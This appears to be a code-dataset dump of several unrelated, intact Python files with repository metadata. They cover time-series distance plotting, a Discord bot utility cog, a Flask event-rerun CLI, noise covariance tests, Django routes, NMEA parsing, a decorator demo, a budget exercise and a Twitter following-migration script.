    # Top edge: series y; left edge: series x (negated so it reads downward).
    ax_s_x.plot(np.arange(x_size), y, "b-", linewidth=3.0, color="#818587")
    ax_s_x.axis("off")
    ax_s_x.set_xlim((0, x_size - 1))

    ax_s_y.plot(-x, np.arange(x_size), "b-", linewidth=3.0, color="#818587")
    ax_s_y.axis("off")
    ax_s_y.set_ylim((0, x_size - 1))

    ax_s_x.set_title(title, size=10)

    return plt
def _plot_alignment(x, y, metric, dist_kwargs: dict = None, title: str = ""):
    """Plot both series and a dashed connector for every aligned index pair.

    Returns the matplotlib ``plt`` module so the caller can save/clear it.
    """
    if dist_kwargs is None:
        dist_kwargs = {}
    try:
        path, dist, cost_matrix = distance_alignment_path(
            x, y, metric=metric, return_cost_matrix=True, **dist_kwargs
        )
    except NotImplementedError:
        # Metrics without a native alignment path fall back to the diagonal.
        path, dist, cost_matrix = _pairwise_path(x, y, metric)

    plt.figure(1, figsize=(8, 8))
    plt.plot(x, "b-", color="black")
    plt.plot(y, "g-", color="black")
    for positions in path:
        # Some paths (e.g. lcss's 1-based indices) can step past the end of
        # a series; skip only those pairs instead of using a bare `except:`
        # that would hide every other error.
        try:
            plt.plot(
                [positions[0], positions[1]],
                [x[positions[0]], y[positions[1]]],
                "--",
                color="#818587",
            )
        except IndexError:
            continue
    plt.legend()
    plt.title(title)
    plt.tight_layout()
    return plt
if __name__ == "__main__":
    # Two fixed example series used for every metric's demo plots.
    x = np.array(
        [
            -0.7553383207,
            0.4460987596,
            1.197682907,
            0.1714334808,
            0.5639929213,
            0.6891222874,
            1.793828873,
            0.06570866314,
            0.2877381702,
            1.633620422,
        ]
    )
    y = np.array(
        [
            0.01765193577,
            1.536784164,
            -0.1413292622,
            -0.7609346135,
            -0.1767363331,
            -2.192007072,
            -0.1933165696,
            -0.4648166839,
            -0.9444888843,
            -0.239523623,
        ]
    )

    import os

    def _save_plt(plt):
        """Save a (plt, filename) pair into the current metric's folder."""
        plt[0].savefig(f"{metric_path}/{plt[1]}")
        plt[0].cla()
        plt[0].clf()

    if not os.path.exists("./plots"):
        os.makedirs("./plots")
    metrics = [
        "euclidean",
        "erp",
        "edr",
        "lcss",
        "squared",
        "dtw",
        "ddtw",
        "wdtw",
        "wddtw",
        "msm",
    ]
    # metrics = ['lcss']
    for metric in metrics:
        metric_path = f"./plots/{metric}"
        if not os.path.exists(metric_path):
            os.makedirs(metric_path)
        # BUG FIX: was `save_plt(...)`, a NameError (helper is `_save_plt`).
        _save_plt(
            (
                _plot_path(x, y, metric, {"epsilon": 1.0}),
                f"{metric}_path_through_cost_matrix",
            )
        )
        _save_plt(
            (
                _plot_path(x, y, metric, {"window": 0.2, "epsilon": 1.0}),
                f"{metric}_path_through_20_cost_matrix",
            )
        )
        if metric == "wdtw":
            # Extra plots showing the effect of the g weighting parameter.
            g_val = [0.2, 0.3]
            for g in g_val:
                file_save = str(g).split(".")
                _save_plt(
                    (
                        _plot_path(x, y, metric, {"g": g}),
                        f"{metric}_path_through_g{file_save[1]}_cost_matrix",
                    )
                )
        _save_plt((_plot_alignment(x, y, metric), f"{metric}_alignment"))
        _save_plt(
            (_plot_alignment(x, y, metric, {"window": 0.2}), f"{metric}_alignment_20")
        )
| 27.254386 | 86 | 0.516254 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 682 | 0.109752 |
d35ae302dc71c9bbf5223948369169ce172e3f51 | 5,310 | py | Python | utils/rtutil.py | RT-Team/RT-Lib | 686c3632f4283c56b5983d2ddc20bd94f7ef2ba4 | [
"MIT"
] | null | null | null | utils/rtutil.py | RT-Team/RT-Lib | 686c3632f4283c56b5983d2ddc20bd94f7ef2ba4 | [
"MIT"
] | null | null | null | utils/rtutil.py | RT-Team/RT-Lib | 686c3632f4283c56b5983d2ddc20bd94f7ef2ba4 | [
"MIT"
] | null | null | null | # RT Ext - Useful Util
# 注意:普通のエクステンションとは違います。
import asyncio
from json import dumps
from time import time
import discord
from aiofile import async_open
from discord.ext import commands, tasks
class RtUtil(commands.Cog):
    """Utility cog providing reaction-driven paginated ("list") embeds."""

    def __init__(self, bot):
        self.bot = bot
        # Per-user pagination state: user_id -> {embeds, timeout, anyone}.
        self.data = {
            "list_embed": {}
        }
        self.ARROW_EMOJI = ["◀️", "▶️"]
        self.now = time()
        self.save_queue = []
        self.list_embed_timeout_loop.start()

    def list_embed(self, member_id: int, embeds: list[discord.Embed],
                   timeout: int = 60, anyone: bool = False
                   ) -> list[discord.Embed, list[str]]:
        """Register a paginated embed session; return (first page, arrow emoji)."""
        self.data["list_embed"][member_id] = {
            "embeds": [embed.to_dict() for embed in embeds],
            # BUG FIX: the expiry must be relative to the current time, not
            # the stale `self.now` captured once in __init__.
            "timeout": time() + timeout,
            "anyone": anyone
        }
        return embeds[0], self.ARROW_EMOJI

    @tasks.loop(seconds=5)
    async def list_embed_timeout_loop(self):
        """Drop expired pagination sessions every 5 seconds."""
        # BUG FIX: snapshot the keys with list() — deleting while iterating
        # a dict raises RuntimeError — and compare against the current time
        # (the original compared the constant self.now, so nothing expired).
        now = time()
        for user_id in list(self.data["list_embed"]):
            if now > self.data["list_embed"][user_id]["timeout"]:
                del self.data["list_embed"][user_id]

    async def list_embed_reaction_task(self, reaction, user):
        """Handle an arrow reaction on one of the bot's paginated embeds."""
        # === list embed === #
        if (not reaction.message.embeds
                or str(reaction.emoji) not in self.ARROW_EMOJI
                or reaction.message.author.id != self.bot.user.id
                or user.id not in self.data["list_embed"]):
            return

        embed = reaction.message.embeds[0]
        now_embed = embed.to_dict()
        for user_id in self.data["list_embed"]:
            if (now_embed in self.data["list_embed"][user.id]["embeds"]
                    and user_id == user.id):
                data = self.data["list_embed"][user.id]
                now = data["embeds"].index(now_embed)
                next_page = 0
                if str(reaction.emoji) == self.ARROW_EMOJI[0]:
                    next_page = now - 1
                elif str(reaction.emoji) == self.ARROW_EMOJI[1]:
                    next_page = now + 1
                if len(data["embeds"]) != next_page and now != 0:
                    embed = data["embeds"][next_page]
                    await reaction.message.edit(embed=embed)
                break
        # Best effort: removing the reaction can fail without permissions.
        try:
            await reaction.message.remove_reaction(str(reaction.emoji), user)
        except Exception:
            pass

    @commands.Cog.listener()
    async def on_reaction_add(self, reaction, user):
        await self.list_embed_reaction_task(reaction, user)

    def unload_cog(self):
        self.list_embed_timeout_loop.cancel()
# Webhook Sender
async def send(channel, author, content=None, embeds=None,
               files=None, wait=False, name='RT-Tool'):
    """Send via a webhook impersonating *author* (name + avatar).

    Reuses the channel's webhook called *name*, creating it if missing.
    """
    wb = discord.utils.get(await channel.webhooks(), name=name)
    wb = wb if wb else await channel.create_webhook(name=name)
    return await wb.send(wait=wait, username=author.name,
                         avatar_url=author.avatar_url, content=content,
                         embeds=embeds, files=files)
async def not_author_send(channel, author_name, icon_url, content=None,
                          embeds=None, files=None, wait=False, name='RT-Tool'):
    """Send via webhook with an arbitrary display name and avatar URL."""
    wb = discord.utils.get(await channel.webhooks(), name=name)
    wb = wb if wb else await channel.create_webhook(name=name)
    return await wb.send(wait=wait, username=author_name, avatar_url=icon_url,
                         content=content, embeds=embeds, files=files)
# easy_embed
def easy_embed(content, color=discord.Embed.Empty):
    """Build a discord.Embed from a lightweight text markup.

    Format: first line ">>Title"; "<Name" starts an inline field,
    "<!Name" a non-inline field; a final line starting with ";;" sets
    the footer; everything before the first field is the description.
    """
    es = ">>"
    spl = content.splitlines()
    title = spl[0][len(es):]
    desc, fields = [], {}
    footer = None if ';;' not in spl[-1] else spl[-1][2:]
    if footer:
        spl.pop(-1)
    spl.pop(0)
    f = None  # name of the field currently being collected
    for c in spl:
        if c == "":
            continue
        if c[0] == '<':
            # "<!Name" marks a non-inline field, "<Name" an inline one.
            f = c[1:] if '!' != c[1] else c[2:]
            fields[f] = {'i': True if '!' != c[1] else False, 'c': []}
            continue
        if f:
            fields[f]['c'].append(c)
            continue
        desc.append(c)
    e = discord.Embed(
        title=title,
        description='\n'.join(desc),
        color=color
    )
    for f in fields.keys():
        e.add_field(
            name=f,
            value='\n'.join(fields[f]['c']),
            inline=fields[f]['i']
        )
    if footer:
        e.set_footer(text=footer)
    return e
# Role TOOL
def check_int(v):
    """Return True if *v* can be converted to an int, else False."""
    try:
        int(v)
    # Catch only conversion failures; `BaseException` also swallowed
    # KeyboardInterrupt/SystemExit, which should propagate.
    except (TypeError, ValueError):
        return False
    else:
        return True
def has_roles(member, roles):
    """Return True if *member* holds at least one of *roles* (matched by id)."""
    for role in roles:
        if discord.utils.get(member.roles, id=role.id):
            return True
    return False
def role2obj(guild, arg):
    """Resolve a comma-separated list of role mentions/IDs/names to Role objects.

    Each item may be a mention like "<@&123>" (sliced to its ID), a raw
    numeric ID, or a role name looked up in the guild.
    """
    roles_raw, roles = arg.split(','), []
    for role in roles_raw:
        if '@' in role:
            # Mention form "<@&ID>": strip "<@&" and the trailing ">".
            roles.append(guild.get_role(int(role[3:-1])))
        elif check_int(role):
            roles.append(guild.get_role(int(role)))
        else:
            roles.append(discord.utils.get(guild.roles, name=role))
    return roles
class Roler(discord.ext.commands.Converter):
    # Command-argument converter: turns "a,b,c" into a list of Role objects.
    async def convert(self, ctx, arg):
        return role2obj(ctx.guild, arg)
def similer(b, a, m):
    """Return True if any length-*m* substring of *a* occurs in *b*.

    BUG FIX: `range(len(a) - m)` skipped the final substring, so e.g.
    similer("abc", "abc", 3) was False; the +1 includes it.
    """
    return any(a[i:i + m] in b for i in range(len(a) - m + 1))
def setup(bot):
    # Extension entry point: returns the constructed cog for the caller.
    return RtUtil(bot)
| 30.170455 | 79 | 0.56403 | 2,568 | 0.479104 | 0 | 0 | 376 | 0.070149 | 2,513 | 0.468843 | 404 | 0.075373 |
d35b8f5e002babab9cbdfd8130a669a4f050c35d | 3,230 | py | Python | asclepias_broker/events/cli.py | ChiaraBi/asclepias-broker | 793e2634591eed926000b19bd342f044b29bedcc | [
"BSD-3-Clause"
] | null | null | null | asclepias_broker/events/cli.py | ChiaraBi/asclepias-broker | 793e2634591eed926000b19bd342f044b29bedcc | [
"BSD-3-Clause"
] | null | null | null | asclepias_broker/events/cli.py | ChiaraBi/asclepias-broker | 793e2634591eed926000b19bd342f044b29bedcc | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright (C) 2018 CERN.
#
# Asclepias Broker is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Events CLI."""
from __future__ import absolute_import, print_function
import datetime
import json
import click
from flask.cli import with_appcontext
from flask import current_app
from ..utils import find_ext
from .api import EventAPI
from ..graph.tasks import process_event
from .models import Event, EventStatus
# Root click group under which the event commands below are registered.
@click.group()
def events():
    """Event CLI commands."""
@events.command('load')
@click.argument(
    'jsondir_or_file',
    type=click.Path(exists=True, dir_okay=True, resolve_path=True))
@click.option('--no-index', default=False, is_flag=True)
@click.option('-e', '--eager', default=False, is_flag=True)
@with_appcontext
def load(jsondir_or_file: str, no_index: bool = False, eager: bool = False):
    """Load events from a directory."""
    files = find_ext(jsondir_or_file, '.json')
    with click.progressbar(files) as bar_files:
        for fn in bar_files:
            with open(fn, 'r') as fp:
                data = json.load(fp)
            # Best-effort bulk load: payloads rejected by the handler are
            # skipped deliberately rather than aborting the whole run.
            try:
                EventAPI.handle_event(data, no_index=no_index, eager=eager)
            except ValueError:
                pass
@events.command('rerun')
@click.option('-i','--id', default=None)
@click.option('-a', '--all', default=False, is_flag=True)
@click.option('-e', '--errors', default=False, is_flag=True)
@click.option('-p', '--processing', default=False, is_flag=True)
@click.option('--no-index', default=False, is_flag=True)
@click.option('--eager', default=False, is_flag=True)
@with_appcontext
# NOTE(review): the Python default `errors=True` differs from the click
# option default (False); click always supplies the value, so the option
# default wins — confirm the True default is intentional.
def rerun(id: str = None, all: bool = False, errors: bool = True, processing: bool = False, no_index: bool = False, eager: bool = False):
    """Rerun failed or stuck events."""
    # A specific event id takes precedence over the bulk flags.
    if id:
        rerun_id(id, no_index, eager)
        return
    if all:
        errors = True
        processing = True
    if processing:
        rerun_processing(no_index, eager)
        rerun_new(no_index, eager)
    if errors:
        rerun_errors(no_index, eager)
def rerun_id(id: str, no_index: bool, eager: bool = False):
    """Re-run the single event identified by *id*, if it exists."""
    event = Event.get(id)
    if not event:
        return
    EventAPI.rerun_event(event, no_index=no_index, eager=eager)
def rerun_processing(no_index: bool, eager:bool = False):
    """Re-run events stuck in Processing for more than a day."""
    yesterday = datetime.datetime.now() - datetime.timedelta(days = 1)
    resp = Event.query.filter(Event.status == EventStatus.Processing, Event.created < str(yesterday)).all()
    for event in resp:
        EventAPI.rerun_event(event, no_index=no_index, eager=eager)
def rerun_new(no_index: bool, eager:bool = False):
    """Re-run events still in the New state after more than a day."""
    yesterday = datetime.datetime.now() - datetime.timedelta(days = 1)
    resp = Event.query.filter(Event.status == EventStatus.New, Event.created < str(yesterday)).all()
    for event in resp:
        EventAPI.rerun_event(event, no_index=no_index, eager=eager)
def rerun_errors(no_index: bool, eager: bool = False):
    """Re-run every event currently in the Error state."""
    failed_events = Event.query.filter(Event.status == EventStatus.Error).all()
    for failed in failed_events:
        EventAPI.rerun_event(failed, no_index=no_index, eager=eager)
d35eac2b776e4340c0c28e8d9b2cac414a8a38f1 | 2,620 | py | Python | test/noise_transformation_test.py | DecodEPFL/eiv-grid-id | 093a0f6f3537ee2d4003b6af6a10caaca986fa7a | [
"CC-BY-4.0"
] | 1 | 2021-07-13T07:26:23.000Z | 2021-07-13T07:26:23.000Z | test/noise_transformation_test.py | DecodEPFL/eiv-grid-id | 093a0f6f3537ee2d4003b6af6a10caaca986fa7a | [
"CC-BY-4.0"
] | null | null | null | test/noise_transformation_test.py | DecodEPFL/eiv-grid-id | 093a0f6f3537ee2d4003b6af6a10caaca986fa7a | [
"CC-BY-4.0"
] | 2 | 2022-02-22T17:14:38.000Z | 2022-02-25T10:29:35.000Z | import numpy as np
import pytest
from src.models.noise_transformation import average_true_var_real, average_true_var_imag, average_true_cov, \
average_true_noise_covariance, naive_noise_covariance
# Each tuple is (mean m, sd_magnitude, sd_phase, expected value); the
# expected values are closed-form expressions for the transformed noise
# moments checked by the parametrized tests below.
test_cases_real_variance = [
    (2 - 3j, 0, 0, 0),
    (0, 1, 1, np.exp(-2) * (2 * np.cosh(2) - np.cosh(1))),
    (2j, 1, 1, 4 * np.exp(-2) * (np.sinh(2) - np.sinh(1)) + np.exp(-2) * (2 * np.sinh(2) - np.sinh(1))),
    (-2j, 1, 1, 4 * np.exp(-2) * (np.sinh(2) - np.sinh(1)) + np.exp(-2) * (2 * np.sinh(2) - np.sinh(1))),
]

test_cases_imag_variance = [
    (4 - 3j, 0, 0, 0),
    (0, 1, 1, np.exp(-2) * (2 * np.sinh(2) - np.sinh(1))),
    (2j, 1, 1, 4 * np.exp(-2) * (np.cosh(2) - np.cosh(1)) + np.exp(-2) * (2 * np.cosh(2) - np.cosh(1))),
    (-2j, 1, 1, 4 * np.exp(-2) * (np.cosh(2) - np.cosh(1)) + np.exp(-2) * (2 * np.cosh(2) - np.cosh(1))),
]

test_cases_covariance = [
    (4 - 3j, 0, 0, 0),
    (0, 1, 1, 0),
    (2j, 1, 1, 0),
    (-2j, 1, 1, 0),
    (np.sqrt(2) * (1 + 1j), 1, 1, 0.5 * np.exp(-4) * (1 + 5 * (1 - np.exp(1)))),
]
@pytest.mark.parametrize("m,sd_magnitude,sd_phase,expected", test_cases_real_variance)
def test_variance_of_real_noise(m, sd_magnitude, sd_phase, expected):
    """Real-part noise variance matches its closed-form expression."""
    res = average_true_var_real(m, sd_magnitude, sd_phase)
    np.testing.assert_allclose(res, expected)
@pytest.mark.parametrize("m,sd_magnitude,sd_phase,expected", test_cases_imag_variance)
def test_variance_of_imag_noise(m, sd_magnitude, sd_phase, expected):
    """Imaginary-part noise variance matches its closed-form expression."""
    res = average_true_var_imag(m, sd_magnitude, sd_phase)
    np.testing.assert_allclose(res, expected)
@pytest.mark.parametrize("m,sd_magnitude,sd_phase,expected", test_cases_covariance)
def test_covariance_of_noise(m, sd_magnitude, sd_phase, expected):
    """Real/imaginary noise covariance matches its closed-form expression."""
    res = average_true_cov(m, sd_magnitude, sd_phase)
    np.testing.assert_allclose(res, expected, rtol=0, atol=1e-10)
def test_cartesian_noise_covariance_matrix():
    """Full covariance for a zero measurement is the expected diagonal."""
    sd_magnitude = 1
    sd_phase = 1
    measurement = np.zeros(2)
    res = average_true_noise_covariance(measurement, sd_magnitude, sd_phase)
    # Real-part variances on the first two diagonal entries, imaginary-part
    # variances on the last two (m = 0 case of the closed forms above).
    expected = np.diag(
        [np.exp(-2) * (2 * np.cosh(2) - np.cosh(1))] * 2 + [np.exp(-2) * (2 * np.sinh(2) - np.sinh(1))] * 2)
    np.testing.assert_allclose(res.todense(), expected)
def test_naive_covariance_matrix():
    """Naive covariance of [0, 1j] equals the hand-computed 4x4 matrix."""
    sd_magnitude = 1
    sd_phase = 1
    measurement = np.array([0, 1j])
    expected = np.array([
        [1, 0, 0, 0],
        [0, 1, 0, 0],
        [0, 0, 0, 0],
        [0, 0, 0, 1],
    # FIX: np.float was deprecated in NumPy 1.20 and removed in 1.24;
    # the builtin float is the documented replacement.
    ], dtype=float)
    res = naive_noise_covariance(measurement, sd_magnitude, sd_phase)
    np.testing.assert_allclose(res.todense(), expected, rtol=0, atol=1e-10)
| 37.428571 | 109 | 0.630153 | 0 | 0 | 0 | 0 | 792 | 0.30229 | 0 | 0 | 102 | 0.038931 |
d35f6d432e8bf0619040f90837d1e5c82d21a5a6 | 257 | py | Python | forherobj_app/urls.py | chaitphani/ForHerObj-repo | 7d4a0f73e585bef10f92bced0d34b117ca8e60b1 | [
"MIT"
] | null | null | null | forherobj_app/urls.py | chaitphani/ForHerObj-repo | 7d4a0f73e585bef10f92bced0d34b117ca8e60b1 | [
"MIT"
] | null | null | null | forherobj_app/urls.py | chaitphani/ForHerObj-repo | 7d4a0f73e585bef10f92bced0d34b117ca8e60b1 | [
"MIT"
] | null | null | null | from django.urls import path
from . import views
# URL routes for the app: home page plus auth endpoints, each mapped to a
# view in forherobj_app.views.
urlpatterns = [
    path('', views.home, name='home'),
    path('login', views.login_fun, name='login'),
    path('signup', views.signup, name='signup'),
    path('logout', views.logout, name='logout'),
]
d3604b03b5b7d1f10584723f9cdd33c78d84a311 | 494 | py | Python | 1138_05_19-nmea.py | nchaparr/Geospatial-Analysis-with-Python | 6e0d1ff429baa4205c63bf842ab950ed4176536f | [
"CC0-1.0"
] | null | null | null | 1138_05_19-nmea.py | nchaparr/Geospatial-Analysis-with-Python | 6e0d1ff429baa4205c63bf842ab950ed4176536f | [
"CC0-1.0"
] | null | null | null | 1138_05_19-nmea.py | nchaparr/Geospatial-Analysis-with-Python | 6e0d1ff429baa4205c63bf842ab950ed4176536f | [
"CC0-1.0"
] | null | null | null | """Parse NMEA GPS strings"""
from pynmea.streamer import NMEAStream
# NOTE: Python 2 script (uses the print statement).
# Stream-parse the NMEA sentences from a text file into pynmea objects.
nmeaFile = open("nmea.txt")
nmea_stream = NMEAStream(stream_obj=nmeaFile)
next_data = nmea_stream.get_objects()
nmea_objects = []
while next_data:
    nmea_objects += next_data
    next_data = nmea_stream.get_objects()
# The NMEA stream is parsed!
# Let's loop through the
# Python object types:
for nmea_ob in nmea_objects:
    # Only some sentence types carry a position fix.
    if hasattr(nmea_ob, "lat"):
        print "Lat/Lon: (%s, %s)" % (nmea_ob.lat, nmea_ob.lon)
| 30.875 | 59 | 0.712551 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 140 | 0.283401 |
d3606a910d1904ced1fc96fd6f2ed700d8ae5f9d | 852 | py | Python | languages/python/src/concepts/P104_Decorators_ClassBasedDecorators.py | vikash-india/DeveloperNotes2Myself | fe277a3c52f73884863f2f72b237365b27a8c882 | [
"MIT"
] | 2 | 2019-05-25T10:09:00.000Z | 2022-03-11T09:06:23.000Z | languages/python/src/concepts/P104_Decorators_ClassBasedDecorators.py | vikash-india/DeveloperNotes2Myself | fe277a3c52f73884863f2f72b237365b27a8c882 | [
"MIT"
] | 2 | 2020-03-31T04:30:17.000Z | 2020-10-30T07:54:28.000Z | languages/python/src/concepts/P104_Decorators_ClassBasedDecorators.py | vikash-india/DeveloperNotes2Myself | fe277a3c52f73884863f2f72b237365b27a8c882 | [
"MIT"
] | 4 | 2019-07-12T13:18:56.000Z | 2021-11-17T08:04:55.000Z | # Description: Class Based Decorators
"""
### Note
* If you want to maintain some sort of state and/or just make your code more confusing, use class based decorators.
"""
class ClassBasedDecorator(object):
    """Decorator implemented as a class.

    Constructing the instance wraps the target callable (logging "INIT");
    calling the instance logs "CALL" and delegates to the wrapped callable.
    """

    def __init__(self, function_to_decorate):
        print("INIT ClassBasedDecorator")
        self._wrapped = function_to_decorate

    def __call__(self, *args, **kwargs):
        print("CALL ClassBasedDecorator")
        return self._wrapped(*args, **kwargs)
# Call Class Based Decorator
@ClassBasedDecorator
def function_1(*args):
    """Print each positional argument on its own line (decorated)."""
    for value in args:
        print(value)
def function_2(*args):
    """Print each positional argument on its own line."""
    remaining = list(args)
    while remaining:
        print(remaining.pop(0))
if __name__ == '__main__':
    # function_1 was decorated at definition time via @ClassBasedDecorator.
    function_1(1, 2, 3)
    # Call Class Based Decorator - Alternate way
    function_2 = ClassBasedDecorator(function_2)
    function_2(1, 2, 3)
| 23.027027 | 115 | 0.692488 | 322 | 0.377934 | 0 | 0 | 83 | 0.097418 | 0 | 0 | 303 | 0.355634 |
d36269c78388362ffe468847db09a5f3e9d22cf0 | 991 | py | Python | 2. Programming Fundamentals With Python (May 2021)/08. Exercise - Lists Basics/09_hello_france.py | kzborisov/SoftUni | ccb2b8850adc79bfb2652a45124c3ff11183412e | [
"MIT"
] | 1 | 2021-02-07T07:51:12.000Z | 2021-02-07T07:51:12.000Z | 2. Programming Fundamentals With Python (May 2021)/08. Exercise - Lists Basics/09_hello_france.py | kzborisov/softuni | 9c5b45c74fa7d9748e9b3ea65a5ae4e15c142751 | [
"MIT"
] | null | null | null | 2. Programming Fundamentals With Python (May 2021)/08. Exercise - Lists Basics/09_hello_france.py | kzborisov/softuni | 9c5b45c74fa7d9748e9b3ea65a5ae4e15c142751 | [
"MIT"
] | null | null | null | # Task 09. Hello, France
def validate_price(items_and_prices):
    """Return True when an 'Item->price' entry is within its category limit.

    Limits: Clothes <= 50.00, Shoes <= 35.00, Accessories <= 20.50;
    any other category is rejected.
    """
    parts = items_and_prices.split('->')
    item, price = parts[0], float(parts[1])
    limits = {'Clothes': 50.00, 'Shoes': 35.00, 'Accessories': 20.50}
    return item in limits and price <= limits[item]
# Input: "Item->price|Item->price|..." entries and a starting budget.
items_and_prices = input().split('|')
budget = float(input())
initial_budget = budget
new_prices = []
for item in items_and_prices:
    item_price = float(item.split('->')[1])
    # Skip items we cannot afford.
    if budget - item_price < 0:
        continue
    if validate_price(item):
        budget -= item_price
        # Items are resold at a 40% markup.
        new_price = item_price + (item_price * 0.40)
        new_prices.append(new_price)
earned = sum(new_prices)
profit = budget + (earned-initial_budget)
budget += earned
if budget >= 150:
    result = 'Hello, France!'
else:
    result = 'Time to go.'
print(' '.join([f'{x:.2f}' for x in new_prices]))
print(f'Profit: {profit:.2f}')
print(result)
| 24.775 | 54 | 0.624622 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 133 | 0.134208 |
d362769ab3fa5593c05cc6ae7ad19f0af97efd9e | 7,293 | py | Python | main.py | itsjoel/migrate-following-python | cb212441ff608f7e68d29181cd13c4744c4bb57b | [
"MIT"
] | 1 | 2018-09-06T17:15:59.000Z | 2018-09-06T17:15:59.000Z | main.py | itsjoel/migrate-following-python | cb212441ff608f7e68d29181cd13c4744c4bb57b | [
"MIT"
] | null | null | null | main.py | itsjoel/migrate-following-python | cb212441ff608f7e68d29181cd13c4744c4bb57b | [
"MIT"
] | null | null | null | """Finds out all the people you need to follow to follow all the same people as another user. Then, optionally, follows them for you."""
import configparser
import csv
import errno
import os
import tweepy
from tqdm import tqdm
#Useful Constants
# Output CSV locations for the target's, your, and the diff follow lists.
PATH_TO_TARGET_CSV = "./output/targetfriends.csv"
PATH_TO_USER_CSV = "./output/yourfriends.csv"
PATH_TO_DIFF_CSV = "./output/difffriends.csv"
# Getting API Keys
SECRETS = configparser.ConfigParser()
SECRETS.read("secrets.ini")
# Gonna have to get ur own keys to use this
API_KEY = SECRETS["API KEYS"]["ConsumerKey"]
API_SECRET = SECRETS["API KEYS"]["ConsumerSecret"]
# https://gist.github.com/garrettdreyfus/8153571
def yes_or_no(question):
    """Prompt the user until they answer yes or no; return True for yes.

    Any answer starting with 'y'/'n' (case-insensitive) is accepted;
    anything else re-prompts.
    """
    while "the answer is invalid":
        reply = str(input(question + ' (y/n): ')).lower().strip()
        # BUG FIX: an empty reply used to raise IndexError on reply[0];
        # now it simply re-prompts.
        if not reply:
            continue
        if reply[0] == 'y':
            return True
        if reply[0] == 'n':
            return False
#Creating Folders
#https://stackoverflow.com/a/273227
# Create ./output if missing; only the "already exists" error is ignored.
try:
    os.makedirs("./output")
except OSError as e:
    # Re-raise anything other than EEXIST (e.g. permission errors).
    if e.errno != errno.EEXIST:
        raise
# Setting Up API
# 'oob' (out-of-band) auth: the user pastes a PIN instead of using a callback URL.
AUTH = tweepy.OAuthHandler(API_KEY, API_SECRET, 'oob')
REDIRECT_URL = AUTH.get_authorization_url()
print("Go to " + REDIRECT_URL +
      " and sign in on the account you want to transfer your Following list to.")
# wait_on_rate_limit makes tweepy sleep through rate-limit windows instead of failing.
API = tweepy.API(AUTH, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)
AUTH.get_access_token(input("Enter the key that comes up here: "))
# https://stackoverflow.com/a/19302732
def list_to_csv(list_to_dump, filename):
    """Write each element of *list_to_dump* as its own single-column CSV row.

    Based on https://stackoverflow.com/a/19302732.
    """
    # BUG FIX: csv files must be opened with newline='' so the csv module
    # controls line endings; without it Windows emits doubled \r\n breaks.
    with open(filename, "w", newline='') as output:
        writer = csv.writer(output, lineterminator='\n')
        for val in list_to_dump:
            writer.writerow([val])
# https://stackoverflow.com/a/19302732
def two_lists_to_csv(header, in_list1, in_list2, filename):
    """Write two parallel lists as a two-column CSV file.

    The first row holds *header* in column one and a single space in
    column two; each following row pairs the lists element by element.
    Based on https://stackoverflow.com/a/19302732.
    """
    rows = zip([header] + in_list1, [" "] + in_list2)
    with open(filename, 'w', newline='') as csv_file:
        csv.writer(csv_file).writerows(rows)
# Wrote this one myself actually. It's for debugging.
def check_limits():
    """Print every rate-limit bucket that has been partially consumed.

    Debugging aid: walks the nested resources dict returned by Twitter's
    rate_limit_status endpoint and reports any endpoint whose remaining
    quota differs from its limit.
    """
    resources = API.rate_limit_status()['resources']
    for category in resources.values():
        for endpoint, status in category.items():
            if status['remaining'] != status['limit']:
                print(endpoint, status)
# https://stackoverflow.com/a/312464
def chunks(my_list, len_of_chunk):
    """Yield successive slices of *my_list*, each at most *len_of_chunk* long."""
    # https://stackoverflow.com/a/312464
    start = 0
    while start < len(my_list):
        yield my_list[start:start + len_of_chunk]
        start += len_of_chunk
# https://stackoverflow.com/a/39320334
def get_100_usernames(list_of_ids):
    """Resolve up to 100 user ids to screen names with one API call.

    Twitter's lookup endpoint caps each request at 100 ids, so
    *list_of_ids* must contain at most 100 entries.
    Based on https://stackoverflow.com/a/39320334.
    """
    return [user.screen_name for user in API.lookup_users(user_ids=list_of_ids)]
# This one too
def get_usernames(ids):
    """Resolve an arbitrarily long list of user ids to screen names.

    Splits *ids* into batches of 100 (the API limit) and shows a
    progress bar while each batch is resolved.
    """
    usernames = []
    for batch in tqdm(chunks(ids, 100), unit="hundred names"):
        usernames.extend(get_100_usernames(batch))
    return usernames
# Wow, this one as well
def retrieve_usernames(list_of_ids, dict_of_ids_to_names):
    """Map ids to usernames using an already-built lookup table.

    Avoids spending API requests on names we have previously fetched.
    Raises KeyError if an id is missing from the table.
    """
    return [dict_of_ids_to_names[user_id] for user_id in list_of_ids]
# https://codereview.stackexchange.com/a/101947
def get_list_of_friends(target_id):
    """Return the ids of every account that *target_id* follows.

    Pages through the friends/ids endpoint with a cursor and shows a
    progress bar. Based on https://codereview.stackexchange.com/a/101947.
    """
    cursor = tweepy.Cursor(API.friends_ids, id=target_id)
    return list(tqdm(cursor.items(), unit="Friend"))
def _check_csv_header_(filename, text_to_check_for):
    """Return True when the first CSV cell of *filename* equals *text_to_check_for*.

    A missing or unreadable file counts as "header not present" (False).
    NOTE(review): an existing but empty CSV raises IndexError here; callers
    only ever read files this script wrote itself, so that case is unhandled.
    """
    try:
        with open(filename) as csvfile:
            rows = list(csv.reader(csvfile))
    except IOError:
        return False
    return rows[0][0] == text_to_check_for
def detect_progress(name_of_target, name_of_user):
    """Check which of the three output CSVs were already completed.

    Returns Tuple (is_target_finished, is_user_finished, is_diff_finished),
    each determined by whether the file's header cell matches the name
    that a previous run would have written.
    """
    return (
        _check_csv_header_(PATH_TO_TARGET_CSV, name_of_target),
        _check_csv_header_(PATH_TO_USER_CSV, name_of_user),
        _check_csv_header_(PATH_TO_DIFF_CSV, name_of_target + " - " + name_of_user),
    )
def restore_progress(filename):
    """Load a previously written two-column CSV of ids and names.

    The first (header) row is skipped and column one is converted back
    to ints.

    Returns
    -------
    id_list : list
        List of ids restored from the CSV
    name_list : list
        List of names restored from the CSV
    """
    with open(filename) as csvfile:
        rows = list(csv.reader(csvfile))
    # Transpose rows into columns (https://stackoverflow.com/a/6473724).
    columns = [list(col) for col in zip(*rows)]
    id_list = [int(value) for value in columns[0][1:]]
    name_list = columns[1][1:]
    return id_list, name_list
# ---- main script: copy the target account's Following list to ours ----
TARGET = input("Target Username (who we'll be copying from): ")
